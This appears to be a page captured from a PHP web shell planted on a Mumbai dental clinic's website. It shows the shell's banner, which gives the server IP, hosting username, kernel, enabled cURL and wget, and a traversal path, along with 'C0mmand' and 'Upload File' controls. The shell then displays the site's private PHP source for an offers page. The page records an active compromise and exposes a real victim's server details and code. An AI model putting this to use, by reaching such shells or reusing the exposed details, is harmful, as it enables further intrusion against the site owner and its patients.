1Server IP : 217.21.90.164 / Your IP : 3.149.245.60 Web Server : LiteSpeed System : Linux in-mum-web840.main-hosting.eu 4.18.0-553.37.1.lve.el8.x86_64 #1 SMP Mon Feb 10 22:45:17 UTC 2025 x86_64 User : u367232671 ( 367232671) PHP Version : 7.4.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF Directory (0755) : /home/u367232671/domains/zeropaindentist.com/public_html/img/product/offer/../../../ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php include dirname(__FILE__) . '/inc/config.php'; include dirname(__FILE__) . '/dbh/conn.php'; ?> <!doctype html> <html lang="en"> <head> <?php include dirname(__FILE__) . "/inc/hedaerlink.php"; ?> <meta name="robots" content="index, follow"> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <link rel="manifest" href="visiontechnology.webmanifest"> <link rel="shortcut icon" type="image/x-icon" href="<?php echo $BASE_URL; ?>/img/logo/favicon.ico"> <link href="<?php echo $BASE_URL; ?>/css/bootstrap.min.css" rel="stylesheet"> <link href="<?php echo $BASE_URL; ?>/css/common-variable.css" rel="stylesheet"> <link href="<?php echo $BASE_URL; ?>/css/style.css" rel="stylesheet"> <title>Exclusive Dental Offers in Mumbai | Free Dental Checkups & X-ray | Zeropain Dentist Specials | Compare with Sabka Dentist & Clove Dental</title> <meta name="description" content="Explore exclusive dental offers in Mumbai at Zeropain Dentist. Enjoy Free Dental Checkups & X-ray with our specials and compare with Sabka Dentist and Clove Dental for the best deals on dental care."> <meta property="og:image" content="https://zeropaindentist.com/img/logo/logo.png"> </head> <body> <?php $Service_page = 'active'; include dirname(__FILE__) . '/inc/nav.php'; ?> <div class="container"> <div class="row py-3"> <?php $sql = "SELECT * FROM `offer` ORDER BY `offer`.`id` DESC"; $query = mysqli_query($conn, $sql); while ($data = mysqli_fetch_assoc($query)) { $img = $data['img']; echo '<div class="col-12 col-sm-6 col-md-4 col-lg-4 p-3"> <div class="bg-white shadow rounded-7 p-2"> <img src="./img/product/offer/' . $img . '" class="w-100 rounded-5" alt=""> </div> </div>'; } ?> </div> </div> <?php include dirname(__FILE__) . '/inc/footer.php'; ?> <script src="<?php echo $BASE_URL; ?>/js/bootstrap.bundle.min.js"></script> <script src="<?php echo $BASE_URL; ?>/js/fontawsome.js"></script> <script src="<?php echo $BASE_URL; ?>/js/main.js"></script> </body> </html>